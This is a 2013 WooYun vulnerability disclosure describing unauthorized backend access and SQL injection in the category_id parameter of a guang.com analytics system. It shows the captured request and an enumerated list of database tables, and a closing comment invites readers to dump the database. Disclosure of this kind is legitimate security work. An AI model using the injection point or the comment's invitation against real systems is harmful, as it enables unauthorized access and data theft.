当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041313

漏洞标题:逛某系统越权及SQL注射漏洞

相关厂商:逛(guang.com)

漏洞作者: 带馅儿馒头

提交时间:2013-10-29 09:28

修复时间:2013-11-03 09:29

公开时间:2013-11-03 09:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-11-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

数据库好多信息的说

详细说明:

1.发现这样一个站点;

2.png


2.在login后面加了个单引号居然爆出了网站的目录,桑不起呀;

1.png


3.然后发现这个地址可以越权访问到后台,原来是酱紫的;

3.png


4.点击查询并抓包,得到如下数据;

csrfmiddlewaretoken=f47f57f0f6ff4f3ab494ade620263238&csrfmiddlewaretoken=f47f57f0f6ff4f3ab494ade620263238&start=2013-10-21&end=2013-10-28&category_id=8


5.随便在category_id参数后面加了单引号,我去,这信息太丰富了,我节选了一部分;

7.png


6.好吧,跑了下出来好多库;

4.png


7.再节选一张表信息;

Database: analyzedb
[78 tables]
+-------------------------------------+
| active_ip |
| ad_category |
| ad_delivery_log |
| ad_relation |
| auth_group |
| auth_group_permissions |
| auth_message |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| brand_product_click_buy_count |
| category_editor_collect_count |
| category_editor_publish_count |
| cellphone |
| channel |
| channel_data |
| crawl_task |
| daily_brand_product_click_buy_count |
| daily_brand_pv_count |
| daily_category_count |
| daily_category_editor_collect_count |
| daily_category_editor_publish_count |
| daily_checkin_count |
| daily_editor_work_count |
| daily_event_click_buy |
| daily_forum_count |
| daily_invitation_count |
| daily_product_comment_count |
| daily_product_count |
| daily_product_discount_detail |
| daily_product_favor_count |
| daily_source_site_count |
| daily_user_count |
| daily_user_count_by_site |
| daily_user_login_count |
| daily_user_share_product |
| db_growth |
| delivery_data |
| delivery_tbk_log |
| django_admin_log |
| django_content_type |
| django_session |
| django_site |
| edm_html_template |
| guang_ST |
| guang_access_log |
| guang_channel_count |
| guang_group_log |
| guang_ip |
| guang_site_count |
| important_merchant |
| iplib |
| merchant_recommend_product |
| prestore_data |
| product_click_buy |
| product_comment_count |
| product_count |
| product_favor_count |
| redirect_stat |
| registration_registrationprofile |
| search_detail_log |
| search_detail_log_new |
| search_log |
| seller_user |
| taobao_buyer_trade_log |
| taobaoke_detail |
| task_detail |
| tbk_detail |
| tbk_detail_history |
| thirdpart_report |
| topic_pageview_log |
| unsubscription_mail |
| user_count |
| user_count_by_site |
| user_count_has_comment |
| user_count_has_favor |
| user_login_record |
+-------------------------------------+


8.信息很丰富,我就不继续深入了;

9.png


10.png


漏洞证明:

见详细说明

修复方案:

你们懂的

版权声明:转载请注明来源 带馅儿馒头@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-11-03 09:29

厂商回复:

最新状态:

2014-06-03:已关闭


漏洞评价:

评论

  1. 2013-10-29 09:35 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    目测忽略!

  2. 2013-10-29 10:24 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @小胖子 忽略了,大家去脱裤:)